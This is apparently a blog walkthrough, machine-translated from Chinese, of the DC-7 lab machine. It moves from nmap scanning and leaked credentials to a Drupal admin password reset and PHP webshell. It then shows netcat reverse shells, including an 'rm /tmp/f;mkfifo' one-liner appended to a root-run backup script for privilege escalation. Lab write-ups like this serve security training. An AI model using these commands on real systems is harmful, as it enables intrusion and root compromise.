当前位置:网站首页>Dc-7 target
Dc-7 target
2022-07-07 06:06:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
ifconfig
Find the host IP
Sweep a wave Intranet , Detect the surviving host
nmap 192.168.61.0/24
Use nmap Tool pair DC-5 The target machine scans the open port
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
Yes 22 and 80 port
Here's a hint DC7USER
use Baidu Search
You can download a file
This also shows that it is important
Download to kali Local
git clone https://github.com/Dc7User/staffdb
cd staffdb
ls
cat config.php
Use SSH Link target , Sign in dc7user It is found that you can successfully connect
ls
find out backups mbox
backups Next :website.sql.gpg website.tar.gz.gpg
Found two files , But it's all about gpg At the end of the ,gpg The command is used to encrypt files , The encrypted files are all garbled
mbox It's a document
The source code of backup execution is found in /opt/scripts Under the table of contents
Get into /opt/scripts Under the table of contents
cd /opt/scripts
see file
cat backups.sh
Found two commands gpg drush
gpg The command is used to encrypt ,drush The order is drupal Commands used in the framework to do some configuration , It can change the user name and password
Enter into /var/www/html Under the table of contents , Because the website will have a admin user , So use drush Command to change admin The user's password is 123456, It is found that it can be modified successfully
cd /var/www/html/
drush user-password admin --password="123456"
admin Your password has been changed to 123456
use dirb Command to scan out the page
dirb http://192.168.61.136
stay Content—>Add content-->Basic page Next , Ready to add PHP Code bounce shell, But found that it does not support PHP
After Baidu knows ,php To be imported as a separate module
PHP Module download address :
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
Check , Then click the bottom install
And then it's all right
Go back to the page at that time , You can use PHP 了
You can connect successfully with ant sword
And then use kali monitor
nc -lvvp 4444
nc -e /bin/bash 192.168.61.129 4444
python -c 'import pty;pty.spawn("/bin/bash")'
Successful connection
find / -name backups.sh 2>/dev/null
then
cd /opt/scripts
ls -l
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh
nc -lvvp 7777
Got it root jurisdiction
cd /root
ls
cat theflag.txt
边栏推荐
- [SQL practice] a SQL statistics of epidemic distribution across the country
- 驱动开发中platform设备驱动架构详解
- R language [logic control] [mathematical operation]
- Mac version PHP installed Xdebug environment (M1 version)
- 如果不知道这4种缓存模式,敢说懂缓存吗?
- Polynomial locus of order 5
- JVM the truth you need to know
- 980. 不同路径 III DFS
- The solution of a simple algebraic problem
- cf:C. Column Swapping【排序 + 模擬】
猜你喜欢
SAP Spartacus checkout 流程的扩展(extend)实现介绍
Opensergo is about to release v1alpha1, which will enrich the service governance capabilities of the full link heterogeneous architecture
VScode进行代码补全
The solution of a simple algebraic problem
POI excel export, one of my template methods
Modes of optical fiber - single mode and multimode
Understand the deserialization principle of fastjson for generics
JVM命令之 jstack:打印JVM中线程快照
Career experience feedback to novice programmers
SAP ABAP BDC (batch data communication) -018
随机推荐
On the discrimination of "fake death" state of STC single chip microcomputer
VScode进行代码补全
980. 不同路径 III DFS
Pytorch builds neural network to predict temperature
How much do you know about clothing ERP?
Polynomial locus of order 5
POI excel export, one of my template methods
PTA TIANTI game exercise set l2-003 moon cake test point 2, test point 3 Analysis
成为资深IC设计工程师的十个阶段,现在的你在哪个阶段 ?
CTFshow--常用姿势
linear regression
Things about data storage 2
Dynamic memory management
[daily training -- Tencent selected 50] 235 Nearest common ancestor of binary search tree
Senior programmers must know and master. This article explains in detail the principle of MySQL master-slave synchronization, and recommends collecting
New Year Fireworks code plus copy, are you sure you don't want to have a look
nVisual网络可视化
An example of multi module collaboration based on NCF
On the difference between FPGA and ASIC
原生小程序 之 input切換 text與password類型